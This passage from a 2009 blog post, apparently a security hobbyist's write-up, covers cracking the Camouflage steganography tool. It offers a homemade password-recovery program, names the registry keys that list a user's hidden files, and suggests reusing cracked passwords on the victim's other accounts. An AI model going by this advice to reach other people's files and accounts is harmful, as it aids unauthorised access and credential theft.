the password can be recovered. Also &lt;a href="http://camouflage.unfiction.com/FAQ.html#Q10"&gt;I thought Question 10 on the FAQ of Camouflage's site was cute.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;center&gt;  &lt;table&gt;   &lt;tbody&gt;&lt;tr&gt;&lt;td&gt; Taken from http://camouflage.unfiction.com/FAQ.html#Q10&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;   &lt;tr&gt;&lt;td&gt;    &lt;b&gt;10. I've forgotten my password and can't uncamouflage a file. What can I do?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Camouflage always asks you for a password whether the file is camouflaged or not, or whether it is a camouflaged file with a password or not. This is because Camouflage doesn't give the game away that a file may be camouflaged.&lt;span style="font-weight: bold;"&gt; &lt;/span&gt;&lt;u style="font-weight: bold;"&gt;For security reasons we cannot release a program to reveal passwords in camouflaged files&lt;/u&gt;&lt;span style="font-weight: bold;"&gt;.&lt;/span&gt; If you forget your password we can't usually help you.&lt;br /&gt;Be careful when typing in passwords - check your CAPS LOCK because Camouflage passwords are case-sensitive.&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;  &lt;/tbody&gt;&lt;/table&gt; &lt;/center&gt;&lt;br /&gt;I have taken the time to code a program to recover these passwords and also test a file for signs of camouflage. I called this program "&lt;a href="http://www.filefactory.com/file/ahf4455/n/InfraReD_zip"&gt;IfraReD&lt;/a&gt;" because IfraRed goggles can help you see someone wearing camouflage. This Program was coded in Visual Basic 6 and is open soruce (Nice and commented this time! ;-D ). As you can see it is very effective. After you have the password, Just use camouflage to decrypt it. Below is the program in action with the password on this picture.&lt;br /&gt;&lt;br /&gt;&lt;center&gt;     &lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_mJgRowKkfO8/SmuxmRoBtaI/AAAAAAAAACs/zWQ3YuUb3QI/s1600-h/thcry-StrongerPassword.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 100px; height: 160px;" src="http://4.bp.blogspot.com/_mJgRowKkfO8/SmuxmRoBtaI/AAAAAAAAACs/zWQ3YuUb3QI/s320/thcry-StrongerPassword.jpg" alt="password = P45$\/\/(0)|2|)" title="password = P45$\/\/(0)|2|)" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_mJgRowKkfO8/SmuyK7cF-oI/AAAAAAAAAC0/oBT9PzbMAOk/s1600-h/InfraReD.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 349px; height: 143px;" src="http://2.bp.blogspot.com/_mJgRowKkfO8/SmuyK7cF-oI/AAAAAAAAAC0/oBT9PzbMAOk/s320/InfraReD.jpg" alt="Don't think I would say this is Secure anymore!!!" title="Don't think I would say this is Secure anymore!!!" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/center&gt;   Now you have a tool to recover the password! How do you locate the files that would contain hidden information? Well how about the registry!&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;HKEY_CURRENT_USER\Software\Camouflage\CamouflageFile&lt;/span&gt;&lt;/b&gt; has the name of files used for hiding (the original ones).&lt;br /&gt;&lt;br /&gt;Also  you should see:&lt;br /&gt;&lt;b&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;HKEY_CURRENT_USER\Software\Camouflage\OutputFile&lt;/span&gt;&lt;/b&gt; Shows a list of the Output files with the hidden data! This can also be used against them as most people always use the same password everywhere, therefore, Crack this one and chances are it will work elsewhere. Enjoy!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2 style="text-align: center;"&gt;&lt;u&gt;Resources and Further Reading&lt;/u&gt;&lt;/h2&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;u&gt;InfraRed&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;w/ binary, source, and test files. 50.3 kB&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;a href="http://www.megaupload.com/?d=KAH440D6"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;Camouflage&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;a href="http://camouflage.unfiction.com/"&gt;http://camouflage.unfiction.com/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;XOR Encryption&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;a href="http://en.wikipedia.org/wiki/XOR_cipher"&gt;http://en.wikipedia.org/wiki/XOR_cipher&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.tech-faq.com/xor-encryption.shtml"&gt;http://www.tech-faq.com/xor-encryption.shtml&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;Further Reading&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;a href="http://www.amazon.com/Hiding-Plain-Sight-Steganography-Communication/dp/0471444499"&gt;Hiding in Plain Sight: Steganography and the Art of Covert Communication&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;script language="JavaScript"&gt;&lt;br /&gt;&lt;!--    // Start hit counter code for BlogPatrol.com   var data = '&amp;r=' + escape(document.referrer)  + '&amp;n=' + escape(navigator.userAgent)  + '&amp;p=' + escape(navigator.userAgent)  + '&amp;g=' + escape(document.location.href);    if (navigator.userAgent.substring(0,1)&gt;'3')&lt;br /&gt;    data = data + '&amp;sd=' + screen.colorDepth &lt;br /&gt; + '&amp;sw=' + escape(screen.width+'x'+screen.height);&lt;br /&gt;&lt;br /&gt;  document.write('&lt;a target="_blank" href=" http://www.blogpatrol.com" alt="BlogPatrol free blog counter" title="Free Blog Counters, Stats and Widgets"&gt;');&lt;br /&gt;  document.write('&lt;img border="0" hspace="0" vspace="0" src=" http://www.blogpatrol.com/counter.php?i=121637' + data + '" /&gt;');&lt;br /&gt;  document.write('&lt;/a&gt;');&lt;br /&gt;  // End hit counter code for BlogPatrol.com&lt;br /&gt;&lt;br /&gt;// --&gt;&lt;br /&gt;&lt;/script&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7020948317530945898-9027669349999289811?l=theunl33t.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/9027669349999289811'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/9027669349999289811'/><link rel='alternate' type='text/html' href='http://theunl33t.blogspot.com/2009/07/personally-discovered-through-my.html' title='Analyzing And Cracking Camouflage'/><author><name>The Unl33t</name><uri>http://www.blogger.com/profile/17211285403285610915</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_mJgRowKkfO8/Sx1rna_mfxI/AAAAAAAAADM/xeeVOgHj1PE/S220/myself.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_mJgRowKkfO8/SmulElISoII/AAAAAAAAAAM/xibl1wj3S-M/s72-c/thcry.jpg' height='72' width='72'/></entry></feed>
